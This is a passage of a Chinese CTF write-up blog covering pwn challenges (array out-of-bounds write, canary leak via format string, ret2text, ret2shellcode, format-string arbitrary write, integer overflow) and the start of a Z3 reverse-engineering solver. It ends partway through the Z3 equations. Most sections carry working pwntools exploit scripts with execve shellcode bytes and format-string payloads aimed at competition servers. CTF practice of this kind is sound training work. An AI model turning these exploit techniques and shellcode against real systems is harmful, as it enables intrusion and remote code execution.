\u82e5\u8f93\u5165\u8d1f\u6570\uff08\u5982-1\uff09\uff0c\u4f1a\u81ea\u52a8\u8f6c\u6362\u4e3a\u8d85\u5927\u65e0\u7b26\u53f7\u6570\uff08\u59820xFFFFFFFF\uff09\uff0c\u5bfc\u81f4\u8bbf\u95ee\u8fdc\u8d85\u9884\u671f\u7684\u5185\u5b58\u5730\u5740\uff0c\u65e0\u6cd5\u901a\u8fc7\u8d1f\u6570\u7d22\u5f15\u5411\u524d\u8d8a\u754c\uff0c\u53ea\u80fd\u901a\u8fc7\u6b63\u6570\u7d22\u5f15\u5411\u540e\u8d8a\u754c\uff08\u598211\uff09\u3002<\/li>\n\n\n\n<li><strong>\u6f0f\u6d1e\u70b9\u5b9e\u9524<\/strong>\uff1a\u51fd\u6570\u5185\u65e0\u4efb\u4f55\u7d22\u5f15\u6821\u9a8c\u903b\u8f91\uff08\u5982<code>a1 &lt; MAX_PARAMS<\/code>\uff09\uff0c\u76f4\u63a5\u6267\u884c<code>world_line_params[a1] = a2<\/code>\u2014\u2014 \u65e0\u8bba<code>a1<\/code>\u591a\u5927\uff0c\u5747\u4f1a\u76f4\u63a5\u8bbf\u95ee\u6570\u7ec4\u5bf9\u5e94\u504f\u79fb\u7684\u5185\u5b58\uff0c\u6570\u7ec4\u8d8a\u754c\u6f0f\u6d1e\u5b8c\u5168\u786e\u8ba4<\/li>\n<\/ul>\n\n\n\n<p>\u7ed3\u5408<code>main<\/code>\u51fd\u6570\u4e0e<code>modify_param<\/code>\u7684\u8c03\u7528\u5173\u7cfb\uff0c\u6f0f\u6d1e\u5229\u7528\u8def\u5f84\u5c31\u51fa\u73b0\u4e86\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7528\u6237\u5728<code>main<\/code>\u51fd\u6570\u9009\u83dc\u5355 2\uff0c\u8f93\u5165 \u201c\u7d22\u5f15\u201d<code>v3<\/code>\uff08<code>unsigned int<\/code>\uff09\u548c \u201c\u65b0\u503c\u201d<code>v4<\/code>\uff08<code>unsigned int<\/code>\uff09\uff1b<\/li>\n\n\n\n<li><code>main<\/code>\u51fd\u6570\u76f4\u63a5\u8c03\u7528<code>modify_param(v3, v4)<\/code>\uff0c\u65e0\u4efb\u4f55\u53c2\u6570\u9884\u5904\u7406\uff1b<\/li>\n\n\n\n<li><code>modify_param<\/code>\u7528<code>v3<\/code>\u4f5c\u4e3a\u7d22\u5f15\uff0c\u76f4\u63a5\u4fee\u6539<code>world_line_params[v3]<\/code>\u2014\u2014 \u82e5<code>v3=11<\/code>\uff0c\u5219\u7cbe\u51c6\u4fee\u6539<code>secret_flag<\/code>\u3002<\/li>\n<\/ol>\n\n\n\n<p>\u597d\uff0c\u51fa\u73b0\u4e86\u4e00\u4e2a\u95ee\u9898\uff0c\u4e3a\u4ec0\u4e48\u662f11\uff1f<\/p>\n\n\n\n<p>\u5728\u4e0a\u9762\u7684\u56fe\u4e0a\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230world_line_params \u79bb secret_flag \u7684\u8ddd\u79bb\u5f88\u8fd1\uff0c\u5b83\u4eec\u5730\u5740\u7684\u5dee\u503c\u4e3a 0x408C-0x4060=0x2c =44\u5b57\u8282\u3002 \u7531\u4e8e\u6574\u578b\u6570\u7ec4\u6bcf\u4e2a\u5143\u7d20\u53604\u5b57\u8282,\u6545\u9700\u8981\u5c06\u6570\u7ec4\u7d22\u5f15\u8c03\u2f8444\/4 = 11\u4fbf\u53ef\u8d8a\u754c\u5230 secret_flag \u5199\u2f0a\u5185\u5bb9\u3002<\/p>\n\n\n\n<p>\u53ea\u8981\u5728secret_flag\u91cc\u5199\u4e0a0x7FFFFFFF<\/p>\n\n\n\n<p>\u6211\u4eec\u5c31\u80fd\u62ff\u5230shell<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br><br># p = process('.\/steins_gate')<br><br>p = remote('ctf.ctbu.edu.cn', 33962)<br><br># \u8ba1\u7b97secret_flag\u76f8\u5bf9\u4e8e\u6570\u7ec4\u7684\u504f\u79fb\u91cf<br>offset = 11<br><br># \u76ee\u6807\u503c\uff1a0x7FFFFFFF<br>target_value = 0x7FFFFFFF<br><br># \u53d1\u9001\u4fee\u6539\u53c2\u6570\u7684\u8bf7\u6c42\uff08\u4f7f\u7528\u5b57\u8282\u7c7b\u578b\uff09<br>p.sendlineafter(b\"&gt; \", b\"2\")  # \u9009\u62e9\u4fee\u6539\u53c2\u6570\u529f\u80fd<br>p.sendlineafter(b\": \", str(offset).encode())  # \u8f93\u5165\u504f\u79fb\u91cf\u4f5c\u4e3a\u7d22\u5f15<br>p.sendlineafter(b\": \", str(target_value).encode())  # \u8bbe\u7f6e\u76ee\u6807\u503c<br><br># \u4ea4\u4e92\u83b7\u53d6shell<br>p.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u91d1\u4e1d\u96c0\u4e0e\u4f60\u7684\u7b80\u5386<\/h3>\n\n\n\n<p>\u8fd9\u9898\u53eb\u91d1\u4e1d\u96c0\uff0c\u524d\u9762\u67e5\u4fdd\u62a4\u7684\u65f6\u5019<\/p>\n\n\n\n<p>\u6709\u7ec6\u5fc3\u7684\u540c\u5b66\u80af\u5b9a\u53d1\u73b0\u4e86\u4e00\u4e2a\u53ebcanary\u7684\u4fdd\u62a4\u673a\u5236<\/p>\n\n\n\n<p>\u800ccanary\u5c31\u662f\u91d1\u4e1d\u96c0\u7684\u82f1\u6587<\/p>\n\n\n\n<p>Canary\uff08\u91d1\u4e1d\u96c0\uff09\u4fdd\u62a4\u673a\u5236\u662f\u4e00\u79cd<strong>\u9632\u5fa1\u6808\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e<\/strong>\u7684\u5b89\u5168\u6280\u672f\uff0c\u5176\u6838\u5fc3\u601d\u60f3\u662f\u5728\u6808\u4e2d\u6613\u88ab\u7be1\u6539\u7684\u5173\u952e\u6570\u636e\uff08\u5982\u51fd\u6570\u8fd4\u56de\u5730\u5740\uff09\u524d\uff0c\u63d2\u5165\u4e00\u4e2a\u7279\u6b8a\u7684 \u201c\u54e8\u5175\u503c\u201d\uff08\u5373 Canary \u503c\uff09\uff0c\u901a\u8fc7\u68c0\u6d4b\u8be5\u503c\u662f\u5426\u88ab\u7be1\u6539\uff0c\u6765\u5224\u65ad\u662f\u5426\u53d1\u751f\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u4ece\u800c\u963b\u6b62\u6076\u610f\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n\n<p>\u8981\u60f3\u5728canary\u4fdd\u62a4\u673a\u5236\u4e0b\u5b8c\u6210\u6808\u6ea2\u51fa\uff0c\u65b9\u6cd5\u8fd8\u662f\u5f88\u591a\u6837\u7684<\/p>\n\n\n\n<p>\u8fd9\u91cc\u53ea\u8bb2\u6700\u7b80\u5355\u7684\u505a\u6cd5<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f\u4f9d\u9760\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\uff0c\u6cc4\u9732canary\uff0c\u7136\u540e\u5148\u586b\u5145\u5783\u573e\u5b57\u8282\u540e\uff0c\u518d\u53d1\u9001\u539fcanary\u503c\uff0c\u518d\u5b8c\u6210\u6ea2\u51fa\uff0c\u8fd4\u56de\u5230\u4f60\u60f3\u8981\u7684\u51fd\u6570\u5730\u5740<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u90a3\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u600e\u4e48\u5f04\uff1f<\/p>\n\n\n\n<p>\u61d2\u5f97\u8bb2\u8fd9\u4e2a\u5c0f\u77e5\u8bc6\u70b9\u4e86<\/p>\n\n\n\n<p><a href=\"https:\/\/zhuanlan.zhihu.com\/p\/465896542\">CTFer\u6210\u957f\u65e5\u8bb011\uff1a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u7684\u539f\u7406\u4e0e\u5229\u7528 &#8211; \u77e5\u4e4e<\/a><\/p>\n\n\n\n<p>\u94fe\u63a5\u8bb2\u5f97\u5f88\u6e05\u695a\u4e86<\/p>\n\n\n\n<p>\u73b0\u5728\u6211\u4eec\u5148\u6765\u627ecanary\u5728\u6808\u4e0a\u7684\u4f4d\u7f6e<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u7a33\u59a5\u7684\u627e\u6cd5\u80af\u5b9a\u662fgdb\u52a8\u8c03<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gdb .\/attachment<br>pwndbg&gt;b *0x4013BB                     #break \u4e0b\u65ad\u70b9\uff0c\u8fd9\u91cc\u76840x4013BB\u662fcall _printf\u7684\u5730\u5740\uff0c\u8fd9\u91cc\u8fd9\u6837\u8c03\u66f4\u5feb\u800c\u5df2<br>pwndbg&gt;r                               #run   \u8fd0\u884c<br><br>pwndbg&gt; canary<br>AT_RANDOM = 0x7fffffffe099 # points to (not masked) global canary value<br>Canary    = 0x8853ad50cb138900 (may be incorrect on != glibc)<br>Thread 1: Found valid canaries.<br>00:0000\u2502-358 0x7fffffffd888 \u25c2\u2014 0x8853ad50cb138900<br>Additional results hidden. Use --all to see them.<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230\u8fd9\u4e00\u6b21\u8fd0\u884c\u7684canary = 0x8853ad50cb138900 \uff08canary\u672c\u8d28\u4e0a\u662f\u4ecefs\u5bc4\u5b58\u5668\u91cc\u53d6\u51fa\u6765\u7684\u968f\u673a\u503c\uff0c\u6240\u4ee5\u6bcf\u6b21\u7684\u503c\u4e0d\u4e00\u6837\uff09<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u65f6\u5019\uff0c\u518d\u7ed3\u5408\u529f\u80fd\u9009\u98791\u91cc\u5b58\u5728\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8fdb\u884c\u6808\u4e0a\u4f4d\u7f6e\u7684\u6cc4\u9732<\/p>\n\n\n\n<p>\u5148ni\uff0c\u6b65\u8fdb\u5230\u8f93\u5165username\u5904<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pwndbg&gt; <br>Please input your username: AAAAAAAA%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p<br>Hello, AAAAAAAA0x7fffffffd9c0-(nil)-(nil)-(nil)-(nil)-0x4141414141414141-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x7fffff0a7025-0x7fffffffdcf8-0x8853ad50cb138900-0x7fffffffdbe0-0x401403<br>\ufffd\ufffd<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\uff0c\u6211\u4eec\u7eaf\u9760\u6570\u90fd\u884c\uff0c\u521a\u521a\u597d\uff0c\u7b2c15\u4f4d\u5c31\u662f\u6211\u4eeccanary\u7684\u503c<\/p>\n\n\n\n<p>\u6240\u4ee5canary\u4f4d\u7f6e\u5c31\u51fa\u6765\u4e86\uff0c\u4e4b\u540e\u6211\u4eec\u5728exp\u91cc\uff0c\u7528%15$p\u7684\u5f62\u5f0f\u83b7\u53d6canary\u503c\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>canary\u5230\u624b\u4e86\uff0c\u5269\u4e0b\u7684\u5c31\u662f\u62ff\u529f\u80fd\u9009\u98792\u91cc\u5b58\u5728\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e\u6253ret2text\u4e86<\/p>\n\n\n\n<p>\u6709backdoor\u51fd\u6570\uff0c\u51fd\u6570\u6548\u679c\u662fcat flag<\/p>\n\n\n\n<p>\u601d\u8def\u5c31\u8fd9\u6837\u4e86<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(log_level = \"debug\")<br><br># p = remote(\"ctf.ctbu.edu.cn\", 33659)<br><br>p = process(\".\/attachment\")<br><br>backdoor = 0x4011C6<br><br>p.sendlineafter(\"choose a function (1-3): \", \"1\")<br><br><br>payload1 = b'aaaaaaaa%15$p'<br>p.sendline(payload1)<br>print(p.recvuntil(b'aaaaaaaa'))<br>canary = int(p.recvuntil(b'00').decode(),16)<br>print(hex(canary))<br><br>p.sendlineafter(\"choose a function (1-3): \", \"2\")<br><br>ret = 0x0000000000401016<br><br><br>p.sendafter(b\"Please input your bio: \",b'a' * (0x88) + p64(canary) + b'a' * 8 + p64(ret) + p64(backdoor))<br><br><br>p.interactive()<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u8fd8\u5b58\u5728\u4e00\u4e2a\u6808\u5e73\u8861\u95ee\u9898\uff0c\u5982\u679c\u4e0d\u5904\u7406\u8fd9\u4e2a\u6808\u5e73\u8861\u95ee\u9898\uff0c\u5c31\u4f1a\u51fa\u73b0\u8fdb\u4e86backdoor\u51fd\u6570\u4f46\u662f\u6ca1flag\u663e\u793a\u7684\u95ee\u9898<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u4e5f\u5f88\u597d\u5904\u7406\uff0c\u901a\u8fc7\u591a\u52a0\u4e00\u4e2aret\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>ret\u7684\u627e\u6cd5\u7684\u8bdd\uff0cROPgadget\u662f\u4e2a\u597d\u4e1c\u897f<\/p>\n\n\n\n<p>\u5982\u8fd8\u6709\u7591\u95ee\uff0c\u8bf7\u8054\u7cfb\u51fa\u9898\u4eba<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">CDU\u7384\u6b66\u676f<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">are you lucky<\/h1>\n\n\n\n<p>\u4ea4\u4e92\uff0c\u53d1\u73b0\u8981\u767b\u5f55\uff0c\u8ddf\u968flogin\u51fd\u6570<\/p>\n\n\n\n<p>\u770b\u5230\u662fencode(114514)<\/p>\n\n\n\n<p>\u8ddf\u8fdbencode\u770b\u52a0\u5bc6\u539f\u7406<\/p>\n\n\n\n<p>\u5927\u81f4\u80fd\u770b\u51fa\u662f\u4e2abase64<\/p>\n\n\n\n<p>\u76f4\u63a5\u6254ai\u52a0\u5bc6\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-59-168x1024.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"168\" height=\"1024\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-59-168x1024.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-713\"  sizes=\"auto, (max-width: 168px) 100vw, 168px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5c31\u6b63\u5e38\u8fdb\u83dc\u5355\u754c\u9762\u4e86<\/p>\n\n\n\n<p>\u89c2\u5bdf\u5404\u51fd\u6570<\/p>\n\n\n\n<p>\u7531\u4e8e\u9898\u76ee\u5f00\u4e86pie\uff0c\u6240\u4ee5\u8981\u627e\u5230\u8fd0\u884c\u65f6\u7684\u5b9e\u9645\u5730\u5740<\/p>\n\n\n\n<p>\u8fd9\u91cc\u53ef\u4ee5\u6ce8\u610f\u5230edit\u51fd\u6570\u4e2d\u5b58\u5728\u4e00\u4e2a\u683c\u4e32<\/p>\n\n\n\n<p>\u901a\u8fc7\u591a\u6b21\u8fdc\u7a0b\u8c03\u8bd5\u53ef\u4ee5\u62ff\u5230\u6808\u4e0a\u53c2\u6570\u7684\u5730\u5740\uff0c\u7136\u540e\u5012\u56de\u53bb\u627e\u5230main\u51fd\u6570\u5730\u5740<\/p>\n\n\n\n<p>\u4ee5\u53ca\u5728root\u51fd\u6570\u91cc\u53ef\u4ee5\u770b\u5230<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-58-1024x546.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"546\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-58-1024x546.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-712\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u9700\u8981\u6539\u6389target\u7684\u503c\u624d\u80fd\u5b8c\u6210\u5199\u5165\/bin\/sh\u7684\u64cd\u4f5c<\/p>\n\n\n\n<p>\u6240\u4ee5\u8fd9\u91cc\u8fd8\u53ef\u4ee5\u6839\u636e\u6cc4\u9732\u7684\u5730\u5740\u627e\u5230target\u7684\u5b9e\u9645\u8fd0\u884c\u5730\u5740\uff0c\u5e76\u5229\u7528\u683c\u4e32\u7684\u4efb\u610f\u5199\u76f4\u63a5\u6539\u6389target\u7684\u503c<\/p>\n\n\n\n<p>\u6700\u540e\u5728\u4f20\u5165\/bin\/sh\u540e\u518d\u4f20\u5165\u4e00\u4e2a\u77ed\u7684shellcode\u5c31\u597d\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(os='linux',arch='amd64',log_level='debug')<br>\u200b<br>p= remote('node10.anna.nssctf.cn',22717)<br>#p = process(\".\/pwn\")<br>username=\"user_name\"<br>password= \"MTE0NTE0\"<br>p.recvuntil(b'username')<br>p.sendline(username)<br>p.recvuntil(b'password')<br>p.sendline(password)<br>\u200b<br>\u200b<br>p.recvuntil(b'choice &gt;&gt;')<br>p.sendline(b'1')<br>p.recvuntil(b'name')<br>\u200b<br>p.sendline(b'%18$p')<br>p.recvuntil(b\"name is\\n\")<br>leaked_addr = int(p.recvline().strip(), 16)<br>log.info(f\"leak:{hex(leaked_addr)}\")<br>main_addr= leaked_addr-0x40a0<br>log.info(f\"main:{hex(main_addr)}\")<br>p.recvuntil(b'new password')<br>p.sendline(b'123')<br>\u200b<br>\u200b<br>target_addr=main_addr+0x40CC<br>log.info(f\"target_addr: {hex(target_addr)}\")<br>payload = fmtstr_payload(20,{target_addr:0x2918})<br>\u200b<br>p.recvuntil(b'choice &gt;&gt;')<br>p.sendline(b'1')<br>p.recvuntil(b'new name')<br>p.sendline(payload)<br>p.recvuntil(b'new password')<br>p.sendline(b'123')<br>\u200b<br>p.recvuntil(b'choice &gt;&gt;')<br>p.sendline(b'3')<br>p.recvuntil(b'access')<br>\u200b<br>p.send(b\"\/bin\/sh\\0\") &nbsp;<br>\u200b<br>p.recvuntil(b\"start your performance\")<br>\u200b<br>shellcode = asm('''<br> &nbsp;  lea rdi, &#91;rsp+0x18] &nbsp; &nbsp;<br> &nbsp;  xor esi, esi &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp;  push 0x3b<br> &nbsp;  pop rax &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp;  cdq &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp;  syscall<br>''')&#91;:15]<br>\u200b<br>p.send(shellcode)<br>p.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">ret2shellcode<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-57.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"651\" height=\"359\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-57.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-711\"  sizes=\"auto, (max-width: 651px) 100vw, 651px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f1a\u8f93\u51fabuf\u7684\u5b9e\u9645\u5730\u5740\uff0c\u8fd4\u56de\u7684\u662fgets\u51fd\u6570\uff0c\u6808\u6ea2\u51fa\u4e86\uff0c\u63d0\u793a\u662fshellcode\uff0c\u76f4\u63a5\u4f20\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u586b\u5145\u81f3\u6ea2\u51fa\uff0c\u627eret\uff0c\u6839\u636e\u5199\u5165\u7684\u5b57\u8282\u957f\u5ea6\u63a7\u5236\u7a0b\u5e8f\u6d41\u5230shellcode\u7684\u5730\u5740\u5c31\u597d\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>io = remote(\"node9.anna.nssctf.cn\", 26033)<br># io = process(\".\/pwn\")<br>offset = 72 &nbsp;<br>context.arch = 'amd64' &nbsp;<br>context.os = 'linux'<br>#shellcode = asm(shellcraft.sh()) &nbsp;<br>shellcode = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05'<br>\u200b<br>io.recvuntil(b'buf @ ') &nbsp;<br>buf_addr = io.recvline().strip() &nbsp;<br>buf = int(buf_addr, 16) &nbsp;<br>print(hex(buf))<br>\u200b<br>\u200b<br>ret = 0x000000000040101a &nbsp;<br>payload = b'a' * offset + p64(ret) + p64(buf + 72 + 8 + 8) + shellcode<br>\u200b<br>\u200b<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Integer_Overflow<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-56.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"457\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-56.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-710\"  sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><\/div><\/figure>\n\n\n\n<p>v4\u662fint\u7c7b\u578b\u7684\u6570\u636e\uff0c\u53ef\u4ee5\u9020\u6210\u6574\u6570\u6ea2\u51fa\uff0c\u5f88\u5e38\u89c4<\/p>\n\n\n\n<p>\u76f4\u63a5\u8f93\u51654294967295<\/p>\n\n\n\n<p>\u5c31\u8fdbshell\u4e86\uff0c\u4ea4\u4e92\u62ffflag\u5373\u53ef<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">fmt<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-55.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"879\" height=\"449\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-55.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-709\"  sizes=\"auto, (max-width: 879px) 100vw, 879px\" \/><\/div><\/figure>\n\n\n\n<p>\u6539\u503c\u5c31\u80fdgetshell<\/p>\n\n\n\n<p>\u80fd\u627e\u5230target\u7684\u6808\u4e0a\u5730\u5740<\/p>\n\n\n\n<p>\u968f\u624b\u624d\u6539\u4e86\u4e24\u6b21\uff0c\u53d1\u73b0\u8f93\u5165\u7b2c8\u4f4d\u5c31\u662ftarget\u7684\u4f4d\u7f6e\uff0c\u90a3\u4e48\u5c31\u76f4\u63a5\u6839\u636e\u683c\u4e32\u7684\u4efb\u610f\u5199\u6548\u679c\u8fdb\u884c\u8986\u5199<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br># p = remote('node9.anna.nssctf.cn', 21634)<br>p = process(\".\/pwn1\")<br>\u200b<br>p.recvuntil(b'message: ')<br>\u200b<br>target_addr = 0x40408c<br>payload = b'A' * 6<br>payload += b'%8$n'<br>payload += b'B' * 6<br>payload += p64(target_addr)<br>\u200b<br>p.sendline(payload)<br>p.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">ret2text 64<\/h1>\n\n\n\n<p>\u6808\u6ea2\u51fa\uff0c64\u4f4d\uff0c\u76f4\u63a5ret\uff0c\u63a7\u5236\u7a0b\u5e8f\u6d41\u5230\u540e\u95e8\u51fd\u6570hint<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"node10.anna.nssctf.cn\",28349)<br>\u200b<br>offset = 8 + 48<br>ret = 0x000000000040101a<br>bin_addr = 0x00000000040136F<br>pd = b'a'*(offset)<br>pd += p64(ret)<br>pd += p64(bin_addr) <br>\u200b<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">ISCTF2025<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Z3<\/h2>\n\n\n\n<p>sub_401000\u9a8c\u8bc1\u51fd\u6570<\/p>\n\n\n\n<p>\u8be5\u51fd\u6570\u5305\u542b23\u4e2a\u590d\u6742\u7684\u7ebf\u6027\u65b9\u7a0b\uff0c\u6bcf\u4e2a\u65b9\u7a0b\u90fd\u6d89\u53ca23\u4e2a\u53d8\u91cf\u7684\u7ebf\u6027\u7ec4\u5408\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from z3 import *<br>\u200b<br>\u200b<br>a = &#91;BitVec(f'a{i}', 8) for i in range(23)]<br>\u200b<br>s = Solver()<br>\u200b<br>\u200b<br>\u200b<br># \u65b9\u7a0b1<br>s.add(94*a&#91;22] + 74*a&#91;21] + 70*a&#91;19] + 12*a&#91;18] + 20*a&#91;16] + 62*a&#91;12] + 82*a&#91;10] + 7*a&#91;7] + 63*a&#91;6] + 18*a&#91;5] + 58*a&#91;4] + 94*a&#91;2] + 77*a&#91;0] - 43*a&#91;1] - 37*a&#91;3] - 97*a&#91;8] - 23*a&#91;9] - 86*a&#91;11] - 6*a&#91;13] - 5*a&#91;14] - 79*a&#91;15] - 63*a&#91;17] - 93*a&#91;20] == 20156)<br>\u200b<br># 